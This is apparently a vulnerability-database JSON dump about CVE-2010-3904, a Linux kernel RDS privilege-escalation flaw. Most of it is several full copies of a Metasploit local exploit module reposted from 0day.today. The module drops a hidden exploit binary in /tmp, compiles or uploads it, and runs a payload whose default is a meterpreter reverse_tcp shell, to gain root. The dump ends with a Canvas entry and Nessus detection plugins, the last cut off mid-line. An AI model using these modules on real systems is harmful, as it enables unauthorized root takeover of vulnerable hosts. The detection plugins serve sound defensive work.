/proc/sys/kernel/modules_disabled').to_s.strip\r\n (modules_disabled.eql?('1') || modules_disabled.eql?('2'))\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n output = cmd_exec \"gcc -o #{path} #{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n register_file_for_cleanup path\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n version = kernel_release\r\n unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&\r\n Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} appears to be vulnerable\"\r\n\r\n unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'\r\n vprint_error 'RDS kernel module is not available'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'RDS kernel module is available'\r\n\r\n if modules_disabled?\r\n unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'\r\n vprint_error 'RDS kernel module is not loadable'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good 'RDS kernel module is loadable'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('rds-fail.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n arch = kernel_hardware\r\n case arch\r\n when /amd64|ia64|x86_64|x64/i\r\n upload_and_chmodx executable_path, exploit_data('rds-fail.x64')\r\n when /x86|i[3456]86/\r\n upload_and_chmodx executable_path, exploit_data('rds-fail.x86')\r\n else\r\n fail_with Failure::NoTarget, \"No pre-compiled binaries are available for system architecture: #{arch}\"\r\n end\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec \"#{executable_path} #{payload_path}\"\r\n output.each_line { |line| vprint_status line.chomp }\r\n end\r\nend\n\n# 0day.today [2018-05-19] #", "sourceHref": "https://0day.today/exploit/30386", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-22T00:43:25", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2018-05-21T00:00:00", "type": "zdt", "title": "Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-05-21T00:00:00", "id": "1337DAY-ID-30402", "href": "https://0day.today/exploit/description/30402", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the rds_page_copy_user function\r\n in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\r\n to execute code as root (CVE-2010-3904).\r\n \r\n This module has been tested successfully on Fedora 13 (i686) with\r\n kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)\r\n with kernel version 2.6.32-21-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Dan Rosenberg', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 20 2010',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'rds-fail.c' ],\r\n [ 'EDB', '15285' ],\r\n [ 'CVE', '2010-3904' ],\r\n [ 'BID', '44219' ],\r\n [ 'URL', 'https://securitytracker.com/id?1024613' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],\r\n [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],\r\n [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],\r\n [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n \r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n \r\n def modules_disabled?\r\n modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip\r\n (modules_disabled.eql?('1') || modules_disabled.eql?('2'))\r\n end\r\n \r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n \r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n \r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n output = cmd_exec \"gcc -o #{path} #{path}.c\"\r\n \r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n \r\n cmd_exec \"chmod +x #{path}\"\r\n register_file_for_cleanup path\r\n end\r\n \r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n \r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n \r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n \r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n \r\n def check\r\n version = kernel_release\r\n unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&\r\n Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} appears to be vulnerable\"\r\n \r\n unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'\r\n vprint_error 'RDS kernel module is not available'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'RDS kernel module is available'\r\n \r\n if modules_disabled?\r\n unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'\r\n vprint_error 'RDS kernel module is not loadable'\r\n return CheckCode::Safe\r\n end\r\n end\r\n vprint_good 'RDS kernel module is loadable'\r\n \r\n CheckCode::Appears\r\n end\r\n \r\n def exploit\r\n unless check == CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n \r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n \r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('rds-fail.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n arch = kernel_hardware\r\n case arch\r\n when /amd64|ia64|x86_64|x64/i\r\n upload_and_chmodx executable_path, exploit_data('rds-fail.x64')\r\n when /x86|i[3456]86/\r\n upload_and_chmodx executable_path, exploit_data('rds-fail.x86')\r\n else\r\n fail_with Failure::NoTarget, \"No pre-compiled binaries are available for system architecture: #{arch}\"\r\n end\r\n end\r\n \r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n \r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec \"#{executable_path} #{payload_path}\"\r\n output.each_line { |line| vprint_status line.chomp }\r\n end\r\nend\n\n# 0day.today [2018-05-21] #", "sourceHref": "https://0day.today/exploit/30402", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-21T14:38:50", "description": "This Metasploit module exploits a vulnerability in the rds_page_copy_user function in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 to execute code as root (CVE-2010-3904). This module has been tested successfully on Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.", "cvss3": {}, "published": "2019-12-24T00:00:00", "type": "zdt", "title": "vReliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3904"], "modified": "2019-12-24T00:00:00", "id": "1337DAY-ID-33692", "href": "https://0day.today/exploit/description/33692", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Post::Linux::Compile\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Module::Deprecated\n\n moved_from 'exploit/linux/local/rds_priv_esc'\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation',\n 'Description' => %q{\n This module exploits a vulnerability in the `rds_page_copy_user` function\n in `net/rds/page.c` (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8\n to execute code as root (CVE-2010-3904).\n\n This module has been tested successfully on:\n\n Fedora 13 (i686) kernel version 2.6.33.3-85.fc13.i686.PAE; and\n Ubuntu 10.04 (x86_64) with kernel version 2.6.32-21-generic.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dan Rosenberg', # Discovery and C exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Oct 20 2010',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '15285' ],\n [ 'CVE', '2010-3904' ],\n [ 'BID', '44219' ],\n [ 'URL', 'https://securitytracker.com/id?1024613' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],\n [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],\n [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],\n [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],\n ],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'Notes' =>\n {\n 'AKA' => ['rds-fail.c'],\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK ]\n },\n 'DefaultTarget' => 0))\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def modules_disabled?\n modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip\n (modules_disabled.eql?('1') || modules_disabled.eql?('2'))\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def check\n version = kernel_release\n unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&\n Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')\n return CheckCode::Safe(\"Linux kernel version #{version} is not vulnerable\")\n end\n vprint_good \"Linux kernel version #{version} appears to be vulnerable\"\n\n unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'\n return CheckCode::Safe('RDS kernel module is not available')\n end\n vprint_good 'RDS kernel module is available'\n\n if modules_disabled?\n unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'\n return CheckCode::Safe('RDS kernel module is not loadable')\n end\n end\n vprint_good 'RDS kernel module is loadable'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n executable_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, exploit_data('cve-2010-3904', 'rds-fail.c')\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n arch = kernel_hardware\n case arch\n when /amd64|ia64|x86_64|x64/i\n upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x64')\n when /x86|i[3456]86/\n upload_and_chmodx executable_path, exploit_data('cve-2010-3904', 'rds-fail.x86')\n else\n fail_with Failure::NoTarget, \"No pre-compiled binaries are available for system architecture: #{arch}\"\n end\n end\n\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Launching exploit...'\n output = cmd_exec \"#{executable_path} #{payload_path}\"\n output.each_line { |line| vprint_status line.chomp }\n end\nend\n", "sourceHref": "https://0day.today/exploit/33692", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:17", "description": "**Name**| linux_rds \n---|--- \n**CVE**| CVE-2010-3904 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| linux_rds \n**Notes**| References: ['http://www.vsecurity.com/resources/advisory/20101019-1/'] \nDate public: 2010-10-19 \nVENDOR: Linux \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3904 \nCVE Name: CVE-2010-3904 \n\n", "cvss3": {}, "published": "2010-12-06T20:13:00", "type": "canvas", "title": "Immunity Canvas: LINUX_RDS", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3904"], "modified": "2010-12-06T20:13:00", "id": "LINUX_RDS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/linux_rds", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:26:06", "description": "This update fixes the following security issue :\n\n - The rds_page_copy_user() function in the Linux kernel Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks. A local, unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\nThe system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101025_KERNEL_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60877);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-3904\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL5.x i386/x86_64\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes the following security issue :\n\n - The rds_page_copy_user() function in the Linux kernel\n Reliable Datagram Sockets (RDS) protocol implementation\n was missing sanity checks. A local, unprivileged user\n could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n\nThe system must be rebooted for this update to take effect.\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1010&L=scientific-linux-errata&T=0&P=2892\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d8428059\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"kernel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-debug-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-doc-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-headers-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kernel-xen-devel-2.6.18-194.17.4.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:39:44", "description": "From Red Hat Security Advisory 2010:0792 :\n\nUpdated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks. A local, unprivileged user could use this flaw to escalate their privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research for reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : kernel (ELSA-2010-0792)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-pae", "p-cpe:/a:oracle:linux:kernel-pae-devel", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-xen", "p-cpe:/a:oracle:linux:kernel-xen-devel", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel"], "id": "ORACLELINUX_ELSA-2010-0792.NASL", "href": "https://www.tenable.com/plugins/nessus/68125", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2010:0792 and \n# Oracle Linux Security Advisory ELSA-2010-0792 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68125);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-3904\");\n script_bugtraq_id(44219);\n script_xref(name:\"RHSA\", value:\"2010:0792\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2010-0792)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2010:0792 :\n\nUpdated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable\nDatagram Sockets (RDS) protocol implementation was missing sanity\nchecks. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research\nfor reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2010-October/001710.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", 